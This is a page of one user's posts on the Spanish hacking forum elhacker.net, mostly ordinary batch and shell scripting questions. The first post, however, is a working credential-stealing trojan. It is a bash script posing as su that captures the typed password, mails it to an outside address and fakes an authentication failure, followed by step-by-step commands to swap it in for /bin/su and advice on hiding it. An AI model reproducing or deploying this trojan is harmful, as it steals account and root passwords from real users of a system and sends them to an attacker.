elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Seguridad Informática / Hacking / Troyanizando "su" en: 11 Octubre 2011, 02:55 am
Creamos un archivo su.sh y colocamos lo siguiente dentro:

Código:
#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo

Damos permisos de ejecución:

Código:
# chmod a+x su.sh

Luego podemos reemplazarlo por el verdadero su:

Código:
# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su

Luego podemos convertir el script en bash a binario como en el siguiente enlace: http://www.redes-seguridad.com.ar/2011/06/convertir-un-script-en-bash-en-un.html

También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda, o moverlo nuevamente.

Opiniones, sugerencias?
2  Programación / Scripting / Re: Script backup BAT con 4 archivos de historial en: 16 Enero 2009, 00:58 am
La fecha no tengo problemas, la genero con el siguiente código:

Código:
C:\backup>echo %date:~6,4%-%date:~3,2%-%date:~0,2%.rar
2009-01-15.rar

Ahora si por ejemplo quisiera mandar esa salida 2009-01-15.rar a una variable de entorno como hago?

Hice lo siguiente:

Código:
C:\backup>set VAR=%date:~6,4%-%date:~3,2%-%date:~0,2%.rar

C:\backup>echo %var%
2009-01-15.rar

Quiero hacer lo siguiente:
Código:
del %var%

Y lo borra ok.

Pero cuando hago el comando completo:
Código:
set VAR=dir /b | awk "{print NR==1,$0}" | find "1 "|awk "{print $2}"
no me funciona, probé poner todo el comando entre comilla o comitas simples y sigue sin funcionar.

Ayuda please.


3  Programación / Scripting / Script backup BAT con 4 archivos de historial en: 15 Enero 2009, 22:29 pm
Hola gente,
Hoy intenté hacer un script en bat para que haga lo siguiente:

Ya tengo hecho un script que backupea semanalmente otros archivos, los comprime y va guardando con el siguiente formato AAAAMMDD, la cuestión es que quiero solamente dentro de la carpeta que los alberga que existan 4 versiones, es decir una para cada semana. Debe ir borrando cuando llega a la 5 versión, la mas vieja.

Llegué a mostrar por pantalla el archivo que debo borrar, pero cuando intento mandarlo a una variable y luego usar del %VARIABLE% no me funciona.

CONCLUISON: Como debo hacer para que la salida de un comando la guarde en la variable de entorno. Y luego borrar el archivo con el nombre que posee esa variable.

A ver si me explico mejor. Por ejemplo tengo por pantalla:
20090115.rar (es la fecha de hoy en formato AAAAMMDD)

Yo quiero almacenar ese numero en una variable y luego borrar el archivo con dicho nombre. Quedando lo siguiente:

Código:
del 20090115.rar

Espero que me haya explicado bien.

Saludos
4  Programación / Scripting / Re: Consultar correo en BATCH en: 26 Mayo 2007, 03:13 am
Implementando el protocolo POP3..
Código:
@echo off
echo user nombre_usuario > save.txt
echo pass password_usuario >> save.txt
echo list >> save.txt
echo retr 1 >> save.txt
nc ip_servidor 110 < save.txt

Exelente amigo, el problema que tengo es que si hago un telnet al 110, ingreso usuario pass y bla bla, anda perfecto, pero lo hago con netcat sin mandar el archivo, tipeando todo y lo unico que logro es conectarme al servidor, pero me dice error al ingresar el user mi_usuario, sabras por que me sucede esto, o ya es mucho pedir?

Igualmente muchas gracias
5  Programación / Scripting / Consultar correo en BATCH en: 31 Marzo 2007, 21:43 pm
Hola muchachos, como andan, estoy tratando de hacer un *.bat que consulte correo mediante telnet, esto es lo que intento hacer:

Código:
telnet ip_servidor 110
user nombre_usuario
pass password_usuario
list
retr 1

La cuestion es que obviamente los comandos siguientes al telnet los ejecuta luego que sierro la conexion al servidor. Como puedo hacer para que los ejecute antes de que se cierre la sesion, algo con los operadores de redireccion? Si es asi no se como hacerlo, podrian ayudarme si a alguien se le ocurre algo.

Muchas gracias..
6  Programación / Scripting / Re: shell script en: 13 Noviembre 2006, 05:10 am
mmm interesante, una cosa muy facil que sabia, pero sinceramente no lo he probado, gracias man, lo probare mañana en la pc y te comento si funciono, creo que funcionara....

Nuevamente muchas gracias, a veces uno tiene su solucion en sus narices y no las ve!!!!
7  Programación / Scripting / Re: shell script en: 10 Noviembre 2006, 11:49 am
Por mas que te agregue el script no vas a entender lo que quiero porque no esta hecho lo que me falta, y por mas que veas todo lo anterior que hice no te serviria pq no sirve de nada con respecto a lo que me falta. Entendes?

Lo explico mejor, quiero ingresar al script una linea que me mate el bash, es decir que me desloguee la sesion en la cual estoy logueado?

Se entendio mejor?
8  Programación / Scripting / Re: shell script en: 9 Noviembre 2006, 01:38 am
Consulta: Tengo que hacer un script que realice actividades de administracion de sistema y al final de script debo matar al bash, es decir que se ejecute un script ni bien inicio la maquina (eso ya lo tengo hecho), que de ciertas opciones (ya lo tengo hecho) y por ultimo (me falta) quiero que como ultima opcion el usuario solo tenga la opcion de salir del script, pero que lo desloguee, probe poner logout ó exit pero no funciona...

Tambien probe kill -9 $$ que supuestamente asi mataria el bash, pero no funciona!!

Como puedo hacerlo?

Gracias
9  Programación / Ejercicios / Re: quiero hacer un bat y no se en: 29 Mayo 2006, 22:09 pm
Entiendo a lo de multiplicar, si pones un numero y luego lo multiplicas por los anteriores, eso se denomina FACTORIAL de un NUMERO, pero lo que no entiendo es que cosa queres sumar????

Explicate un poco mejor..
10  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 17 Enero 2006, 01:47 am
Hola gente no se si realmente existe un comando para listar procesos bajo linea de comandos, se que existe para matarlos (taskkill), pero seguramente debe existir para listarlos...

Me baje un archivo tasklist.exe pero es para winXp existe alguno para win2k???

En caso que no exista se podria hacer algun bat para hacerlo??

Coincido con alguien que escribio mas arriba habria que agregar en programacion un foro que sea de programacion bat..

Esto esta muy bueno y aprendi mucho.....
Espero que siga asi...

Gracias
Adios
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines